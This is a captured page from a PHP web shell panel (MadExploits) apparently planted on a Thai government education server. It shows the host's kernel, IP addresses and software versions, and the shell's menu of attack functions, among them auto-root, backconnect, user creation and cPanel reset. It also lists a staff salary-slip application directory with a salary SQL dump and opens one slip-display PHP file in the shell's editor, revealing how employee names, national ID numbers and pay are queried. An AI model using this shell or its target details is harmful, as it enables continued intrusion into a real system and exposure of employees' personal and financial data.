Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
salary29 /
[ HOME SHELL ]
Name
Size
Permission
Action
Connections
[ DIR ]
drwxr-xr-x
_mmServerScripts
[ DIR ]
drwxr-xr-x
_notes
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
admin1
[ DIR ]
drwxr-xr-x
salary2020
[ DIR ]
drwxr-xr-x
salary2021
[ DIR ]
drwxr-xr-x
PHPCounter.txt
8
B
-rwxrwxrwx
apr64.php
11.58
KB
-rw-r--r--
apr65.php
11.58
KB
-rw-r--r--
apr66.php
11.58
KB
-rw-r--r--
apr67.php
11.59
KB
-rw-r--r--
apr68.php
11.59
KB
-rw-r--r--
aug64.php
11.58
KB
-rw-r--r--
aug65.php
11.58
KB
-rw-r--r--
aug66.php
11.58
KB
-rw-r--r--
aug67.php
11.59
KB
-rw-r--r--
aug68.php
11.59
KB
-rw-r--r--
dec63.php
11.4
KB
-rw-r--r--
december64.php
11.59
KB
-rw-r--r--
december65.php
11.59
KB
-rw-r--r--
december66.php
11.59
KB
-rw-r--r--
december67.php
11.6
KB
-rw-r--r--
edit_ok.php
1.33
KB
-rw-r--r--
edit_user.php
6.73
KB
-rw-r--r--
feb64.php
11.41
KB
-rw-r--r--
feb65.php
11.59
KB
-rw-r--r--
feb66.php
11.59
KB
-rw-r--r--
feb67.php
11.59
KB
-rw-r--r--
feb68.php
11.6
KB
-rw-r--r--
index.php
5.9
KB
-rw-r--r--
jan64.php
11.39
KB
-rw-r--r--
jan65.php
11.58
KB
-rw-r--r--
jan66.php
11.58
KB
-rw-r--r--
jan67.php
11.58
KB
-rw-r--r--
jan68.php
11.59
KB
-rw-r--r--
jul64.php
11.58
KB
-rw-r--r--
jul65.php
11.58
KB
-rw-r--r--
jul66.php
11.58
KB
-rw-r--r--
jul67.php
11.59
KB
-rw-r--r--
jul68.php
11.59
KB
-rw-r--r--
jun64.php
11.59
KB
-rw-r--r--
jun65.php
11.59
KB
-rw-r--r--
jun66.php
11.59
KB
-rw-r--r--
jun67.php
11.6
KB
-rw-r--r--
jun68.php
11.6
KB
-rw-r--r--
login_fail.php
1.35
KB
-rw-r--r--
logo2.png
229.12
KB
-rw-r--r--
main.php
17.8
KB
-rw-r--r--
main_.php
8.84
KB
-rw-r--r--
mar64.php
11.58
KB
-rw-r--r--
mar65.php
11.58
KB
-rw-r--r--
mar66.php
11.58
KB
-rw-r--r--
mar67.php
11.58
KB
-rw-r--r--
mar68.php
11.59
KB
-rw-r--r--
may64.php
11.58
KB
-rw-r--r--
may65.php
11.58
KB
-rw-r--r--
may66.php
11.58
KB
-rw-r--r--
may67.php
11.59
KB
-rw-r--r--
may68.php
11.59
KB
-rw-r--r--
nouser.php
6.72
KB
-rw-r--r--
nov63.php
11.4
KB
-rw-r--r--
nov64.php
11.59
KB
-rw-r--r--
nov65.php
11.59
KB
-rw-r--r--
nov66.php
11.59
KB
-rw-r--r--
nov67.php
11.6
KB
-rw-r--r--
oct63.php
11.39
KB
-rw-r--r--
oct64.php
11.58
KB
-rw-r--r--
oct65.php
11.58
KB
-rw-r--r--
oct66.php
11.58
KB
-rw-r--r--
oct67.php
11.59
KB
-rw-r--r--
sep64.php
11.58
KB
-rw-r--r--
sep65.php
11.58
KB
-rw-r--r--
sep66.php
11.58
KB
-rw-r--r--
sep67.php
11.59
KB
-rw-r--r--
slipmanaul.jpg
25.32
KB
-rw-r--r--
slipmanaul.pdf
367.72
KB
-rw-r--r--
spmsalary.sql
697.92
KB
-rw-r--r--
spt.jpg
22.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mar66.php
<?php require_once('Connections/Connecdata.php'); ?> <?php if (!isset($_SESSION)) { session_start(); } $MM_authorizedUsers = ""; $MM_donotCheckaccess = "true"; // *** Restrict Access To Page: Grant or deny access to this page function isAuthorized($strUsers, $strGroups, $UserName, $UserGroup) { // For security, start by assuming the visitor is NOT authorized. $isValid = False; // When a visitor has logged into this site, the Session variable MM_Username set equal to their username. // Therefore, we know that a user is NOT logged in if that Session variable is blank. if (!empty($UserName)) { // Besides being logged in, you may restrict access to only certain users based on an ID established when they login. // Parse the strings into arrays. $arrUsers = Explode(",", $strUsers); $arrGroups = Explode(",", $strGroups); if (in_array($UserName, $arrUsers)) { $isValid = true; } // Or, you may restrict access to only certain users based on their username. if (in_array($UserGroup, $arrGroups)) { $isValid = true; } if (($strUsers == "") && true) { $isValid = true; } } return $isValid; } $MM_restrictGoTo = "../admin/index.php"; if (!((isset($_SESSION['MM_Username'])) && (isAuthorized("",$MM_authorizedUsers, $_SESSION['MM_Username'], $_SESSION['MM_UserGroup'])))) { $MM_qsChar = "?"; $MM_referrer = $_SERVER['PHP_SELF']; if (strpos($MM_restrictGoTo, "?")) $MM_qsChar = "&"; if (isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']) > 0) $MM_referrer .= "?" . $_SERVER['QUERY_STRING']; $MM_restrictGoTo = $MM_restrictGoTo. $MM_qsChar . "accesscheck=" . urlencode($MM_referrer); header("Location: ". $MM_restrictGoTo); exit; } ?> <?php if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } $colname_Recordset1 = "-1"; if (isset($_SESSION['MM_Username'])) { $colname_Recordset1 = $_SESSION['MM_Username']; } $colname_Recordset1 = "-1"; if (isset($_SESSION['MM_Username'])) { $colname_Recordset1 = (get_magic_quotes_gpc()) ? $_SESSION['MM_Username'] : addslashes($_SESSION['MM_Username']); } mysql_select_db($database_Connecdata, $Connecdata); $query_Recordset1 = sprintf("SELECT * FROM mar66 WHERE id_per = '%s' ORDER BY id DESC", $colname_Recordset1); $Recordset1 = mysql_query($query_Recordset1, $Connecdata) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); $totalRows_Recordset1 = mysql_num_rows($Recordset1); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>:: สลิปเงินเดือนพนักงานราชการ ลูกจ้าง สพม.29 ::</title> <style type="text/css"> <!-- .style4 {color: #000000} --> </style> </head> <body> <table width="100%" border="0"> <tr> <td align="center"><form id="form1" name="form1" method="post" action=""> <table width="90%" border="1"> <tr> <td colspan="2"><table width="100%" border="0"> <tr> <td><table width="100%" border="0"> <tr bgcolor="#FF9900"> <td height="27" colspan="2" align="center" bgcolor="#FF9900"><table width="100%" border="0"> <tr> <td width="10%" align="center"><img src="logo2.png" width="112" height="161" /></td> <td width="90%" align="center"><h2><strong><span class="style4">สำนักงานเขตพื้นที่การศึกษามัธยมศึกษา</span></strong>อุบลราชธานี อำนาจเจริญ </h2></td> </tr> </table> </td> </tr> <tr height="27"> <td width="42%" height="27"><strong>รายละเอียดเงินเดือน มีนาคม 2566 </strong></td> <td width="58%"><p><strong>สังกัด <?php echo $row_Recordset1['school']; ?></strong></p> </td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFF2DD"><strong>ชื่อ <?php echo $row_Recordset1['name']; ?></strong></td> <td height="27" align="left" bgcolor="#FFF2DD"><strong>ตำแหน่ง <?php echo $row_Recordset1['position']; ?></strong></td> </tr> <tr height="27"> <td height="27" colspan="2" align="left"><strong>เลขประจำตัวประชาชน <?php echo $row_Recordset1['id_per']; ?></strong></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td width="51%" align="center" valign="top"><table width="100%" border="0"> <tr> <td><table width="100%" border="0"> <tr> <td height="27" colspan="3" align="center" bgcolor="#FF9900"><h3><strong>รายรับ</strong></h3></td> </tr> <tr height="27"> <td height="27" align="left">เงินเดือน</td> <td align="right"><?php echo $row_Recordset1['money_sum']; ?></td> <td align="left"> บาท</td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFF2DD">ค่าครองชีพ</td> <td align="right" bgcolor="#FFF2DD"><?php echo $row_Recordset1['money_psr']; ?></td> <td align="left" bgcolor="#FFF2DD"> บาท</td> </tr> <tr height="27"> <td height="27" align="left">อื่นๆ (ตกเบิก)</td> <td align="right"><?php echo $row_Recordset1['another']; ?></td> <td align="left"> บาท</td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFDBA6">รวมรับ</td> <td align="right" bgcolor="#FFDBA6"><?php echo $row_Recordset1['sum_money']; ?></td> <td align="left" bgcolor="#FFDBA6"> บาท</td> </tr> </table></td> </tr> <tr> <td> </td> </tr> </table></td> <td width="49%" align="center" valign="top"><table width="100%" border="0"> <tr> <td><table width="100%" cellpadding="1" cellspacing="1"> <col width="198" /> <col width="145" /> <col width="116" /> <col width="63" /> <col width="200" /> <col width="136" /> <tr height="27"> <td height="27" colspan="3" align="center" bgcolor="#FF9900"><h3><strong>รายจ่าย</strong></h3></td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFF2DD">ประกันสังคม</td> <td align="right" bgcolor="#FFF2DD"><?php echo $row_Recordset1['so_mon']; ?></td> <td align="left" bgcolor="#FFF2DD"> บาท</td> </tr> <tr height="27"> <td height="27" align="left">สหกรณ์ออมทรัพย์สามัญ</td> <td align="right"><?php echo $row_Recordset1['oomon_mon']; ?></td> <td align="left"> บาท</td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFF2DD">สหกรณ์ออมทรัพย์ครู</td> <td align="right" bgcolor="#FFF2DD"><?php echo $row_Recordset1['oomun_mon']; ?></td> <td align="left" bgcolor="#FFF2DD"> บาท</td> </tr> <tr height="27"> <td height="27" align="left">ธนาคารอาคารสงเคราะห์</td> <td align="right"><?php echo $row_Recordset1['aso_mon']; ?></td> <td align="left"> บาท</td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFF2DD">ธนาคารออมสิน</td> <td align="right" bgcolor="#FFF2DD"><?php echo $row_Recordset1['omsin_mon']; ?></td> <td align="left" bgcolor="#FFF2DD"> บาท</td> </tr> <tr height="27"> <td height="27" align="left">กยศ.</td> <td align="right"><?php echo $row_Recordset1['sdl_mon']; ?></td> <td> บาท</td> </tr> <tr height="27"> <td height="27" align="left">อื่นๆ</td> <td align="right"> </td> <td align="left"> บาท</td> </tr> <tr height="27"> <td height="27" align="left" bgcolor="#FFDBA6">รวมจ่าย</td> <td align="right" bgcolor="#FFDBA6"><?php echo $row_Recordset1['sum_pay']; ?></td> <td align="left" bgcolor="#FFDBA6"> บาท</td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td colspan="2" align="center"><table width="100%" border="0"> <td height="27" align="center" bgcolor="#FF9900"><strong>คงเหลือรับจริง <?php echo $row_Recordset1['real_mon']; ?> บาท ( <?php echo $row_Recordset1['bahttext']; ?> )</strong></td> </table></td> </tr> </table> <p><a href="main.php">กลับหน้าหลัก</a> / <a href="javascript:window.print()"> พิมพ์หน้านี้ </a></p> </form></td> </tr> </table> </body> </html> <?php mysql_free_result($Recordset1); ?>
Close